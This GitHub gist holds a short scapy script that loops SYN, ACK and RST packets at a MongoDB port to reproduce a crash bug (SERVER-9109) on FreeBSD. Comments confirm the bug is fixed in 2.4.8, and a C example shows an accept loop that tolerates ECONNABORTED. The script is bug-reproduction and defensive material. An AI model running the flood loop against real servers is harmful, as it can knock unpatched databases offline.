Created December 9, 2013 09:33
```python
# scapy script to trigger bug in mongod / mongos: https://jira.mongodb.org/browse/SERVER-9109
#
# Do $(iptables -I INPUT -p tcp --dport 12345 -j DROP) at vm host before flooding.

vm = '1.2.3.4'  # src
victim = '9.8.7.6'  # dst

def f():
    syn = IP(src=vm, dst=victim)/TCP(sport=12345, dport=27017, flags="S")
    sa = sr1(syn)
    ack = IP(src=vm, dst=victim)/TCP(sport=12345, dport=27017, seq=sa.ack, ack=sa.seq+1, flags="A")
    rst = IP(src=vm, dst=victim)/TCP(sport=12345, dport=27017, seq=sa.ack, ack=sa.seq+1, flags="RA")
    send([ack, rst])

while True: f()
```
I confirm, I can't reproduce the bug with 2.4.8 anymore.
@dannenberg `vm` is a Linux qemu-kvm based virtual machine that I launched nearby the `victim` (same datacentre, I used vm as it was trivial to set up). `victim` is a FreeBSD-9 host running mongod. I could not reproduce the issue with a Linux host using the same script. I've not looked if the Linux kernel can return ECONNABORTED from accept().

The script is run at `vm` after setting up iptables to drop some packets (to prevent possible replies from the Linux TCP/IP stack).

I plan to upgrade my FreeBSD instances to 2.4.8 next Monday, I'll be able to tell if the bug is fixed for me.

Matt, excuse me for the late reply, github generated no notifications about your comment :(
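
The comment above mentions `accept()` returning ECONNABORTED. As an added example (not code from the gist or from MongoDB), here is a C accept loop that discards such connections instead of treating the error as fatal, assuming the listener sees ECONNABORTED for a connection that was reset before `accept()` ran. `accept_tolerant`, `run_script` and `fake_accept` are hypothetical names, and the errno sequences are constructed.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/socket.h>

/* Same signature as accept(2), so a scripted stand-in can replace it. */
typedef int (*accept_fn)(int, struct sockaddr *, socklen_t *);

/* Errors about the one connection being dequeued, not the listening socket. */
static int is_transient(int err)
{
    return err == ECONNABORTED || err == EINTR;
}

/* Hypothetical helper: returns a connected fd, or -1 with errno set to a
 * non-transient error. *skipped counts the aborted connections discarded. */
int accept_tolerant(int lfd, accept_fn do_accept, unsigned *skipped)
{
    *skipped = 0;
    for (;;) {
        int fd = do_accept(lfd, NULL, NULL);
        if (fd >= 0 || !is_transient(errno))
            return fd;
        ++*skipped; /* a real server would log and rate-limit here */
    }
}

/* Constructed stand-in: fails with each scripted errno, then returns fd 7. */
static const int *script;
static size_t script_left;
static int fake_accept(int lfd, struct sockaddr *sa, socklen_t *len)
{
    (void)lfd; (void)sa; (void)len;
    if (script_left == 0)
        return 7;
    script_left--;
    errno = *script++;
    return -1;
}

int run_script(const int *errs, size_t n, unsigned *skipped)
{
    script = errs;
    script_left = n;
    return accept_tolerant(-1, fake_accept, skipped);
}

int main(void)
{
    const int flood[] = { ECONNABORTED, ECONNABORTED, EINTR }; /* constructed */
    unsigned skipped;
    int fd = run_script(flood, 3, &skipped);
    printf("fd=%d after skipping %u aborted connections\n", fd, skipped);
}
```

Errors that do concern the listener or the process, such as EMFILE, still come back to the caller with `errno` intact.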